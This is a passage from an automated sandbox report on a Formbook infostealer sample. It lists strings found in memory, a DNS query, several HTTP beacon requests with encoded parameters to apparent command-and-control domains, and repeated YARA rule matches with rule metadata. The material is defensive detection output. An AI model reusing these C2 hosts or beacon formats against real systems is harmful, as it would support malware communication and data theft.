          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3460154101.0000016D90D23000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://js.foundation/
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://maps.google.com/maps/api/geocode/json
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3457252334.0000016D90CBC000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3459867236.0000016D90D12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mathiasbynens.be/
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com?gologin=1
          Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
          Source: SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://skypeassets.azurewebsites.net/skype-assets/
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spoprod-a.akamaihd.net/files/fabric/assets/item-types/48_2x/
          Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sprinklesapp.com/
          Source: SkypeApp.exe, 0000001C.00000003.3207425165.00000175FE800000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3632311271.00000175FED9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webkit.org/licensing-webki)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webkit.org/licensing-webkit/
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000005.00000000.1237220182.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3728348444.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3074166064.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.2274294266.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
          Source: explorer.exe, 00000005.00000000.1240160729.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3741990027.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bingapis.com/api/v6/Places/AutoSuggest
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.3717351568.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtek.com/)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json)
          Source: SkypeApp.exe, 0000001C.00000003.3457935765.0000016D89130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/JetBrains.Annotations/10.1.5)
          Source: explorer.exe, 00000005.00000000.1234977867.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
          Source: SkypeApp.exe, 0000001C.00000003.3206225605.00000175FEC00000.00000004.00000020.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3458082522.0000016D828EA000.00000004.00000800.00020000.00000000.sdmp, SkypeApp.exe, 0000001C.00000003.3252862995.0000016D80008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/iframe_api
          Source: explorer.exe, 00000005.00000002.3748918987.000000001197F000.00000004.80000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.3713430429.0000000004DFF000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
          Source: unknownDNS traffic detected: queries for: www.klxcv.xyz
          Source: C:\Windows\explorer.exeCode function: 5_2_10B4FF82 getaddrinfo,setsockopt,recv,5_2_10B4FF82
          Source: global trafficHTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=jZmXybDTEhqhfjbWt8DWyZKNvc7QdVfFN8RblV5F5bs2BRUWluOZEJKJ+J3f2kZBRyfQB9gctA== HTTP/1.1Host: www.gaming-chairs-vn-vi-2885437.fyiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?Bb_=n8Crfq9d8L0uMe2mi2N2bIuprmrMns3qA2Eid6rDPq5MkWbkjsGFJF992xVz/9ETWq9TUrQEIA==&M2Mp=6lX0R0Q HTTP/1.1Host: www.sklm888.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=9Lm8jqPme8OjdFMw6eGY6bGRl079o6M7fF/LdPaGLMmXDMBCcOms1FNC+m6WNGhZ2iLvmxSXpQ== HTTP/1.1Host: www.wokeeducationhateskids.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?Bb_=qL/w1+NyuWgJ0bdil4hFQmgMppJTUe9u/d2a0uQzQpF5pPc2wY/Xb3Z/xNefSsFgsh4j65y1Iw==&M2Mp=6lX0R0Q HTTP/1.1Host: www.umertazkeer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?Bb_=gDkZXs6+uubhkTTBwUg7wBT+4b2V8qQlIvdPiiNfmflrZ9ZAj1bLhBmsLpsiQ7EDnpvm500CUg==&M2Mp=6lX0R0Q HTTP/1.1Host: www.glocraze.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ju29/?M2Mp=6lX0R0Q&Bb_=4V5Ap+fQ4NIPSmUR7w8IZjRflmo1SlImCs0PelLViRgAq2SQgX/qLJiweWaWTZxUZ6zbHBn8KA== HTTP/1.1Host: www.durufilmyapim.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exeCode function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FF1

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: xheuzyg.exe PID: 1356, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: xheuzyg.exe PID: 1664, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 4312, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: SecuriteInfo.com.FileRepMalware.16340.31219.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.xheuzyg.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.xheuzyg.exe.2f50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.xheuzyg.exe.2f50000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.xheuzyg.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
